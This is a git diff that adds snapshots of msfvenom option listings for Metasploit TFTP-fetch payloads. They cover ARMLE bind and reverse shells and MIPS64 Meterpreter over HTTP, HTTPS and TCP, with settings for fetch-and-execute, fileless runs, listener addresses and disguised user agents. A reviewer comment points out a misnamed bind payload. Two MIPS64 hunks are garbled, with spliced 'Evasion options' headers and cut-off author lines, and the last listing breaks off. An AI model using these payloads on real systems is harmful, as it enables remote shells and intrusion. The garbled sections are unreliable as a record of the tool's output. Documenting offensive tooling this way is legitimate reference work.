@@ -0,0 +1,85 @@ + + Name: TFTP Fetch, Linux dup2 Command Shell, Bind TCP Stager + Module: payload/cmd/linux/tftp/armle/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + nemo + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME VDHecTvPvunA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + dup2 socket in r12, then execve. + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 
0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-shell-reverse_tcp.txt new file mode 100644 index 0000000..18fbf7b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-shell-reverse_tcp.txt 
@@ -0,0 +1,93 @@ + + Name: TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/armle/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + nemo + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME auLFBDkDm no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + dup2 socket in r12, then execve. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 
0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-shell_bind_tcp.txt new file mode 100644 index 0000000..15a5063 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-shell_bind_tcp.txt 
@@ -0,0 +1,76 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/armle/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + civ + hal + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ARGV0 sh no argv[0] to pass to execve +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME POpqisoXHgYa no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + Connect to target and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-shell_reverse_tcp.txt new file mode 100644 index 0000000..a98d6aa --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-shell_reverse_tcp.txt 
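Review bot: the cmd-linux-tftp-armle-shell_bind_tcp.txt hunk above records the module name as "TFTP Fetch, Linux Command Shell, Reverse TCP Inline" for payload/cmd/linux/tftp/armle/shell_bind_tcp, whose own description says "Connect to target and spawn a command shell" and whose options are LPORT plus an optional RHOST, i.e. bind semantics; the reverse variant that follows carries the identical name. This is what msfvenom prints, so it is not a capture error and should not be edited in the snapshot, but it deserves a line in the commit message or an upstream fix to the module's Name so that anyone grepping these files for "Bind TCP" does not miss this payload.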
@@ -0,0 +1,82 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/armle/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + civ + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ARGV0 sh no argv[0] to pass to execve +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME BewNPvfLMi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..87c8325 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_http.txt 
@@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mips64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/mips64/meterpreter_reverse_http: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ULcUboOIOpD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a MIPS64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..b37792e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_https.txt 
@@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mips64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/tftp/mips64/meterpreter_reverse_https: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME cyKaiYttJDPB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a MIPS64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..994a8a5 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mips64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME UFpMtCCwLd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a MIPS64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the 
functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + 